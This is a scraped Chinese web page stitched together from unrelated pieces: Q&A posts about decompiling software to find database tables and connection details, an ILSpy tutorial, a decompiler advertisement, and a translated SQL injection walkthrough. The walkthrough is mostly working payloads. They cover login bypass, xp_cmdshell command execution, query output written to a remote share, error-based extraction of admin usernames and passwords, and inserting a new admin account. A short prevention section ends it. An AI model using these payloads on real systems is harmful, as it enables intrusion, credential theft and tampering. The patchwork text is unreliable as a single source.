反编译能否看到sql语句大全

软件客户端用的是sql2008的数据库,软件的每个操作都是查询或者添加数据库中的某个表格,_百度知道
软件客户端用的是sql2008的数据库,软件的每个操作都是查询或者添加数据库中的某个表格,
请问怎么知道软件每个操作是访问的那个表那?
提问者采纳
可与公司数据库管理员沟通,通过软件操作是无法看到操作哪张后台的数据库表的
其他类似问题
为您推荐:
其他1条回答
除非你能反编译DLL。不过我也可以把user表设置为客户表。比如customer表,然后再看清楚里面的代码逻辑,没办法NO!没办法,一般就是操作客户资料,反过来把customer设置为user,否则无能为力,甚至有的需要破解加密,最简单的办法是进行英文猜测。所以
参考资料:
您可能关注的推广
sql2008的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁当前位置: >
> 求:根据这几条反编译后的语句,怎么找到数据库的连接信息
求:根据这几条反编译后的语句,怎么找到数据库的连接信息
yaoyuheng & at
求:根据这几条反编译后的语句,如何找到数据库的连接信息 我反编译了一个PBD文件,可以看到以下代码片断:******************************* &
create ()*******************************appname = &dossier&message = create messagesqlca = create transactionsqlda = create dynamicdescriptionareasqlsa = create dynamicstagingareaerror = create error...uf_window_center(this)ls_dsn = profilestring(&Dagl.ini&,&database&,&DSN&,&Error&)..dagl.ini文件的内容如下:[system]AppName=&*****&[database]DSN=DaglLogId=admin[content]PaperSize=256Left=2350Right=1340Top=950Bottom=850[Post]PaperSize=256Left=2500Right=1940Top=1530Bottom=1260[gz]PaperSize=256Left=2000Right=910Top=1400Bottom=1080我在哪里能找到连接该数据库的连接代码吗 profilestring
ODBC吧,看一下ODBC里有没有Dagl。要么注册表里找一下。
yaoyuheng & &
& & (0)(0)
要是看连接该数据库的连接代码就要找 connect using sqlca要是看数据库连接参数就要通过ODBC,注意ODBC里的用户DSN和系统DSN都要看一下。顺便问一句用的是什么数据库?yaoyuxing & &
& & (0)(0)
本问题标题:
本问题地址:
温馨提示:本问题已经关闭,不能解答。
暂无合适的专家
&&&&&&&&&&&&&&&
希赛网 版权所有 & &&&&湘教QS2-164&&增值电信业务经营许可证湘B2-您的位置: >
ILSpy反编译工具的使用
学习标签:
本文导读:ILSpy反编译工具的使用。不过,ILspy需要在电脑上安装.NET Framework 4.0。ILspy可以将一个dll文件转换为C#或VB语言。ILspy对于单个文件可以保存为.cs文件或.vb文件,当文件较多时,可以选择保存为项目文件。C#语句可被ILspy反编译出来,并可支持yield return语句和 lambdas表达式的反编译。
以前一直使用reflector来查看.net类库的一些信息,不过,自2011年2月份开始,reflector就开始转向收费软件了,所以爱好免费软件的开发者们转而开发自己的反编译软件。于是ILspy就因运而生了。ILSPY这个开源工具的目的就是代替reflector的,它反编译出的代码和reflector差不多。
SharpDevelop 是除Visual Studio外,另一个可选择的唯一的.NET开放工具,并且它是开源的。它提供的功能也相当不错,几乎就是在重写Visual Studio。最新的版本中,直接增加了对Visual Studio的解决方安案文件和项目文件的支持。ILSpy是SharpDevelop小组的反编译工具,也是开放源代码的,下面介绍一下它的调试器和反编译器。
ILspy的界面截图
ILSpy的界面与Reflector相似,左边以树型控件显示程序集和它的类型,右边是对应的源代码。基础的反编译功能,与Reflector相比,丝毫不差,甚至有时候用Reflector无法反编译(因为加密)的程序集,用ILSpy可以反编译。
ILspy需要在电脑上安装.NET Framework 4.0.
ILspy常用的几个功能
基础的类型反编译功能都具备
现在只支持把源代码反编译为C#和IL语言,不支持VB。
效果图为:
ILSpy的代码保存功能
当点击一个类型时,选择File-&Save Code会反编译当前的类型并保存到指定的文件中,当选择程序集时,Save Code保存为一个项目(csproj)文件,并且把它所有的类型加到这个项目中。
ILSpy的调试器功能
这里要说的调试器,不是指Visual Studio的源码级别的调试器,而是指程序集的调试器。Reflector有个Addin,可以直接附加在Visual Studio中,调试第三方的类型库,而不需要把第三方的类型库反编译后,以源码的形式添加到项目中。
ILSpy也有这个功能,直接对第三方的程序集进行调试,有两种选项
如果第三方类型库是可执行程序(EXE),可以用Debug an executable来启动这个程序。
如果第三方类型库是程序集(DLL),可以用Attach to running application来附加,以启动程序集的调试。
从上图中已经可以看出它的用法,和调试源代码一样。在需要监视变量值的方法的地方,设置断点,当程序运行到此时,就可以通过监视窗体来观察变量的值。
这两者的区别是,Attach to a running application调试时,如果代码经过编译器优化,则监视器会无法得到它的值。
如图所示,无法显示正在调试的变量num的值,因为代码已经经过优化。官方推荐的方式是Debug an executable
与在Visual Studio中调试.NET源代码一样,你可以Step into,Step over,continue,同时状态栏会显示就绪(stand by),运行中(running),正在调试(debugging)。
除了调试程序集的C#/VB形式的代码之外,也可以以IL代码形式调试,如下图所示
ILSpy的debugger是以插件形式存在的,请确保包含ILSpy.Debugger的Plugin。
不过调试.NET程序集一定需要PDB文件才可以。然而ILSpy却没有产生PDB文件(no PDB files are generated),而且它不可以调试ASP.NET Web application和Web 服务。
您可能感兴趣
一月好评排行榜当前访客身份:游客 [
已有文章 2054 篇
当前位置:
SQL注入演练
英文原文:
0人收藏此文章,
推荐于 2年前 (共 11 段, 翻译完成于 09-16) ()
参与翻译(4人):
这篇文章目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己.
1.0 介绍 当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并且你知道管理员经常为机器打补丁, 我们就不得不使用web攻击方式了. SQL注入是web攻击的一种类型 ,这种方式只需要开放80端口就够了并且即使管理员打了全部的补丁也能工作. 它攻击的目标是web程序(像ASP,JSP,PHP,CGI等)本身而不是web服务器或系统上运行的服务.
本文不介绍任何新的东西, SQL注入已经被广泛的讨论和使用. 我们写这篇文章目的是因为我们想要使用SQL注入进行一些演练测试,希望这个能对各位有用. 你可以在这里找到一两个窍门但是请你关注下"9.0 哪里有更多的信息?" 可以得到关于SQL注入更多,更深入的技术.
&翻译的不错哦!
1.1 什么是SQL注入?
通过网页的输入项来注入SQL查询或命令是一种技巧。许多网页会从用户那里获取参数,并构建SQL查询来访问数据库。以用户登录为例,页面收集用户名和密码然后构建SQL去查询数据库,来校验用户名和密码的有效性。通过SQL注入,我们可以发送经过精心编造的用户名和/或密码字段,来改变SQL查询语句并赋予
我们其它一些权限。&
1.2 你需要什么?
任意web浏览器。&
2.0 你应该寻找什么?
尝试寻找那些允许你提交数据的页面,即: 登录页面,查询页面,反馈信息等等。有时,HTML页面会用POST命令来把参数发送到另外一个ASP页面上去。那么,你可能在URL中看不到参数。不过,你可以查看页面的HTML源代码,查找"FORM"标签。你会在一些HTML源代码中看到类似下面的东东:
&FORM action=Search/search.asp method=post&
&input type=hidden name=A value=C&
&/FORM& 位于&FORM&和&/FORM&之间的所有内容都可能暗含着有用的参数(利用你的智慧)。&
&翻译的不错哦!
2.1 如果你找不到任何带有输入框的页面怎么办?
你应该寻找诸如ASP, JSP, CGI, 或 PHP这样的页面。尤其要找那些携带有参数的
URL,比如:
http://duck/index.asp?id=10
3.0 如何测试它是否是易受攻击的?
从一个单引号技巧开始。输入类似这样的内容:
hi' or 1=1--
到登录页面中,或者密码中,甚至直接在URL中。例如:
&- Login: hi' or 1=1--
&- Pass: hi' or 1=1--
&- http://duck/index.asp?id=hi' or 1=1--
假如你必须在一个hidden字段中来这样做,就把HTML源代码下载下来,保存到硬盘上,修改URL和相应的
hidden字段。例如:
&FORM action=http://duck/Search/search.asp method=post&
&input type=hidden name=A value="hi' or 1=1--"&
如果够幸运,不需要任何用户名和密码你就可以登录。
&翻译的不错哦!
3.1 为什么是 ' or 1=1--?&
让我们通过另外一个例子来展示' or 1=1-- 的重要性。除了能绕过“登录”验证,它还能展示一些在正常情况下很难看到的额外信息。假设,有一个ASP页面,其功能是将我们导航到下面的URL:
http://duck/index.asp?category=food&
在URL中,'category'是变量名;food是赋给变量的值。为了完成导航功能,我们猜想ASP页面应该包含下面的代码(这些代码是我们为了完成此测试而编写的真实代码):
v_cat = request("category")& sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"& set rs=conn.execute(sqlstr)&
如上所示,变量v_cat获取了参数category的值,SQL语句将变成:
SELECT * FROM product WHERE PCategory='food'&
该SQL语句将返回符合where条件的的结果集。在本例中,where条件是PCategory='food'&。
下面,假设我们将URL改成下面的形式:
http://duck/index.asp?category=food' or 1=1--&
现在,变量v_cat等于"food' or 1=1-- "。将变量v_cat在SQL中进行替换,我们将得到下面语句:
SELECT * FROM product WHERE PCategory='food' or 1=1--'&
该语句将得到product表中所有记录,无论PCategory是否等于'food'。“--”告诉MS SQL server忽略其后面的所有内容(笔者注:其实可以理解为注释,“--”后面所有的内容都为注释),方便我们处理单引号。在某些情况下,"--"可以被替换成”#“。
如果后台的数据库不是SQL Server,查询语句的单引号就不能被忽略。在这种情况下,我们可以尝试下面的查询条件:
' or 'a'='a&
此时,SQL语句将变成:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'&
根据真实的SQL语句,我们还可以尝试以下各种变形:
' or 1=1--& " or 1=1--& or 1=1--& ' or 'a'='a& " or "a"="a& ') or ('a'='a
&翻译的不错哦!
4.0 我如何通过SQL注入来进行远程执行?
能够注入SQL命名通常意味着我们可以随意执行任何SQL查询。默认安装的MS SQL 服务是作为SYSTEM来运行的,
Windows系统中的Administrator。我们可以利用存储过程,比如master..xp_cmdshell 来进行远程执行:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
如果单引号(')不管用,可以试试双引号
分号会终止当前的SQL查询,这就允许你开始一个新的SQL命名。要验证命令是否执行成功,你需要监听来自10.10.1.2的
ICMP数据包,检查是否收到来自服务器的数据包:
#tcpdump icmp
如果你没有收到任何来自服务器的ping请求,并且收到了暗示许可错误的信息,则有可能是管理员限制了Web用户对存储过程的访问。
&翻译的不错哦!
5.0 如何获取SQL查询的输出?
可以通过使用sp_makewebtask把你的查询写入到HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
注意这个目标IP的文件夹"share"的共享权限是Everyone.
6.0 如何从数据库的ODBC错误消息中获取数据?
我们几乎可以在MS SQL服务器产生的错误消息中得到任何我们想要的数据. 通过类似下面的这个地址:
http://duck/index.asp?id=10
我们将试图把这个整数'10'和另外的字符串进行UNION联合操作:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
系统表 INFORMATION_SCHEMA.TABLES 包含了服务器上所有表的信息. 这个TABLE_NAME 字段包含数据库中每个表的字段. 这样就不存在无此表无此字段的问题了. 看我们的查询语句:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
这个语句将会返回数据库中第一个表的名字. 当我们使用这个字符串值和一个数字'10'进行UNION操作, MS SQL 服务器将会试图转换这个字符串(nvarchar)为一个数字. 这会产生一个错误, 因为我们不能把nvarchar类型转换成数字. 服务器将会产生以下错误信息:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
这个错误消息清楚的告诉我们这个值不能转换为数字. 同时呢,里面也包含了数据库中第一个表的名字 ,就是"table1".
想获取下一个表的名字,我们使用下面的语句:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
我们也可以使用LIKE关键词来搜索数据:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
这个匹配, '%25login%25' 的结果和 %login% 是一样的在SQL Server服务器中.这样,我们将得到
匹配的第一个表的名字, "admin_login".
&翻译的不错哦!
6.1 如何挖掘到表所有列的名称?
我们可以使用另一个非常有用的表INFORMATION_SCHEMA.COLUMNS 来标出某一个的表所有列名:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
注意错误提示,里面已经包含了第一个列名, 下面我们使用NOT IN ()来取得下一个列的名称:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
按上面的步骤继续下一个,我们就能获得剩下的所有列的名称, 即"password", "details"等列. 当我们得到下面的这个错误提示时,就表示我们已经找出所有的列名了.&
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
&翻译的不错哦!
6.2 如何检索到我们想要的数据?
现在我们已经确认了一些重要的表,以及它们的列名,我们可以用同样的技巧从数据库中挖掘任何我们想要的信息.
现在,让我们从这个"admin_login"表中得到第一个login_name的值吧:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
根据上面的错误提示我们知道这里有一个管理员的登录名是"neo".下面,我们从数据库中到"neo"的密码:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
密码就在错误提示里了,现在让我们用"neo"和密码"m4trix"登录试试吧.
&翻译的不错哦!
6.3 如何获取数字型字符串的值?
上面所述的技术具有局限性。在我们试图转换包含有效数字(即只是0-9之间的字符)的时候,我们没有得到任何错误信息。让我们试着获取"trinity"的密码"31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'
我们可能得到"此页面不存在“的错误。原因在于:在于整数(这时是10)联接之前,密码"31173"将转换为一个数字。由于这是一个有效地联接(UNION)语句,因此SQL Server不会抛出ODBC错误信息,因此我们将不能获取到任何数字型的项。
为了解决这个问题,我们给数字型字符串后面提交一些字母,这样可以确保转换失效。让我们看看下面这个查询:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'
我们只是给我们需要的密码文本后添加了加号(+)。(“+”的ASCII编码是0x2b)。我们将给真正的密码后添加“(空格)休眠符“。因此,即使我们有一个字符型字符串”31173“,它最终将变为”31173休眠符“。通过手工调用convert()函数试图把“31173休眠符“转换为整数时,SQL Server抛出ODBC错误信息:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
现在,你就可以使用密码为"31173"的"trinity"用户登陆了。
&翻译的不错哦!
7.0 如何向数据库中更新或插入数据?
当我们成功的获取到一张表的所有字段名后,我们就有可能UPDATE甚至INSERT一条新记录到该表中。例如,修改"neo"的密码:
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
下面INSERT一条新记录到数据库中:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
现在我们可以用用户名"neo2"和密码"newpas5"来登录了。
&翻译的不错哦!
8.0 如何避免SQL注入?
& & 过滤参数中的单引号、双引号、斜杠、反斜杠、分号等字符;以及NULL、回车符、换行符等扩展字符。这些参数可能来自于:
前台表单(form)中的用户输入
URL中的参数
& & 对于数字,在将其传入SQL语句之前将其从字符串(String)转换成数字(Number);或者用ISNUMERIC函数确定其确实是数字。
& & 将SQL Server的运行用户修改为低权限用户(low privilege user)。
& & 删除不再需要的存储过程,例如:master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask&
&翻译的不错哦!
本人正在黑客研究院学习,反编译源码9094人阅读
PowerBuilder反编译器,支持5-12,pkb2.5。用于源码丢失后的工程恢复。
关键字:Powerbuilder反编译,PB反编译,PBD还原,PBD反编译
powerbuilder Reverse Engineering,decompile powerbuilder
目前demo支持显示5-12的代码,有部分限制见说明部分,仅供测试。最新版v
正式版购买价格:&
CSDN下载地址:
各QQ-PB群均有上传到群共享,群内网友直接在群共享内下载即可。
有问题请返回给我。
以下是图片和简单说明书一份:
******************************************************************************************
****&&&&PowerBuilder反编译器 DEMO V&&&&******
******************************************************************************************
反编译powerbuilder编译后的pbd文件,支持版本5;6.5;7;8;9;10;10.5;11;11.5;12;PKB2.5共计11个版本。
改进完善后主要用于工程文档丢失后的恢复,即工程恢复。
在此demo中释放出全部版本作为测试,囊括了5-12的全部常用版本。
*******************************************************************************************
DEMO限制说明
出于保护他人软件的考虑,本软件并不会完全开放或者免费提供。能从互联网上得到的该软件程序,一定是经过
条件编译有所限制的,是不可能通过破解来达到增加功能的目的。
*******************************************************************************************
Demo中有如下限制,使得本软件仅仅用于测试和评估,而不会对他人的权益造成危害。
请如此测试:
A。标记代码:
&请在对象的Instance var区增加如下两个变量:
&string is_demo = &aaaaaaaa.....aaaaaaaa&&&&&&&&&&&&&&& //共200个字母a,小写;
&long il_demo =
&请同时在对象的Shared Var区增加两个变量:
&string ss_demo = &aaaaaaaa.....aaaaaaaa&&&&&&&&&&&&&&& //共200个字母a,小写;
&long sl_demo =
&增加这四个变量申明后,将你自己的测试代码编译成pbd;
&但仍受到如下Demo限制,不要期望我发布一个&完全&版本给大家测试,这是永远不可能的。望见谅:
&1。只能查看包括对象在内的9个控件(根容器算一个控件,如w_main算第一个控件,他上面放一个按钮算第二个控件),
&&&&&& 每个控件下的事件和函数也只能看到不超过9个;
&2。SQL语句在一段代码中不得超过3个(包括select into,select blob,update blob,dynamic sql,cursor等);
&3。条件判断和跳转语句,如if& end if,do while for next等逻辑判断和跳转结构体,总数量不超过12个;
B。非标记代码:
&1。只能查看包括对象在内的4个控件(根容器算一个控件,如w_main算第一个控件,他上面放一个按钮算第二个控件),
&&&&&& 每个控件下的事件和函数也只能看到不超过4个;
&2。SQL语句在一段代码中不得超过3个(包括select into,select blob,update blob,dynamic sql,cursor等);
&3。条件判断和跳转语句,如if& end if,do while for next等逻辑判断和跳转结构体,总数量不超过12个;
&4。connect所在代码段无法看到;(保护数据库连接参数)
&5。disconnect所在代码段无法看到;(保护数据库连接参数)
&6。halt and halt close所在代码段无法看到;(保护数据库连接参数)
&7。行数大于40行的代码段无法看到。
被限制的代码段有提示:
&/*Expression is Empty or Demo Limit*/
另两种代码为空白的情况,是本身就是为空,不是反编译器无法解析:
&如果你自定义某个事件或者函数,然后删除它的全部代码,其函数名仍然保存着,反编译出来代码为空,也不会显示上面
&的提示,请注意区别,并不是程序原因造成,是因为代码本身就是空的。请核对你自己的源代码以了解这种情况。
&此外。这样的空代码也是经常存在的:
&on uo_yy.create
&&&&& &&&&&&&& //empty
&on uo_yy.destroy
&&&&&&&& //empty
********************************************************************************************
#&DataWindow请用RecoveryDW文件夹内的程序来恢复,它利用的是pb自己的函数来还原,它是pb开源代码。
#&本软件也可以直接打开PBL文件,读取里面的编译码和源码。当你没有安装所有的PB版本时,这个功能能帮你方便查看。
#&在右边的RichEdit中按住鼠标左键,滚动滑轮,可以放大文字。
# &对于继承自父级的对象,需要先打开父级对象,如一个pbd中包含w_center,w_main;w_main继承自w_center,只打开一次pbd是无法
&得到它的所有属性的,因为他的属性首先得继承父对象的属性的public和protect。请选择打开该pbd,然后再次选择打开。第二次时
&将向前追溯第一个pbd中得到的w_center的属性作为w_main的继承属性。(因在一个pbd中,排列顺序决定了不一定先分析到w_center)
#&如果PowerShield混淆过的代码,会在文件列表处显示Encrypt字样,在代码段也会提示://expression is Encryption!
&如果PBobfuscator混效过的代码,反编译器打开文件会卡死。
#&debug菜单中的灰色菜单是在正常使用时不需要的菜单,编译时已经变灰色;仅供作者打断点用。
#&默认的事件return语句:在编译时,只要你没有在event中的最后放置return语句,编译器都将自动放置一个。所以大家看到末尾的
&return不要惊奇。
********************************************************************************************
正在改进的是:
1。Export to PBL;
2。Find功能;
3。取系统内置对象的属性处仍需要改进,目前尚不时遇到0x001D错误;
********************************************************************************************
修改日志:
&修正了字符串续行(&)时排版不整齐问题,现已能对齐左值位置,并向右缩进2个tab。如:
&&ls_1 = &aaa& &
&&&+ &bbb& &
&&&+ &ccc&
&修正了行缩进和排版
&修正了for...next识别不准的一个bug,减少了一个goto语句
&发布测试版开放所有版本测试
&校验pb5的PBM_EVENTID,修正pb5中select into 和cursor取sql字串时地址的偏差
2010.09&&发布测试版开放9和11
2010.09&&完成All in One的源码导出,准备发行demo,all in one时,发现:
&&type oleobject_1 from oleobject within w_2 descriptor &pb_nvo& = &true&
&&pbkiller没有对nvo的descriptor &pb_nvo& = &true&进行说明,测试发现如果导入后IDE会认不到vno,vno组件会丢失。
&发布混淆器DEMO和混淆器正式版,在半年期间,反编译与混淆器一起修除bug,完善
2010.03&&研究Powershield混淆器原理,写出反混淆程序并验证其可靠性不足
0.03&开发完成反编译器90%工作量
2009.07&&研究pbd文件格式
********************************************************************************************
下载位置:&& 以及各大pb群组均有
文字介绍:&
&&请勿在有重要文件的电脑上用UltraEdit 和winhex打开本软件,也不要用任何调试器载入本软件。由此造成的任何后果自负。
********************************************************************************************
因操作简单,故本次demo仅仅说明这些内容,待正式版做成详细说明书。
有任何的意见或建议,请邮件联系。
联系:&/&QQ:(不在线时请优先以邮件联系,每晚必收邮件)。
&chenggang (国庆 & 嫦娥二号奔月)
pb反编译工具,pb反编译软件,PB反编译专家,pb反编译器,pbd反编译,decompile, pb decompile,decompile powerbuilder,powerbuilder反编译,pb程序反编译,pb反编译程序
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:714518次
积分:10600
积分:10600
排名:第586名
原创:270篇
转载:211篇
评论:355条
(1)(1)(1)(1)(2)(2)(1)(1)(1)(1)(6)(1)(3)(4)(2)(2)(9)(6)(11)(2)(4)(3)(1)(2)(8)(1)(8)(17)(2)(2)(4)(1)(8)(5)(8)(8)(16)(2)(7)(2)(4)(5)(1)(2)(12)(29)(7)(4)(20)(55)(176)}

我要回帖

更多关于 sql语句 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信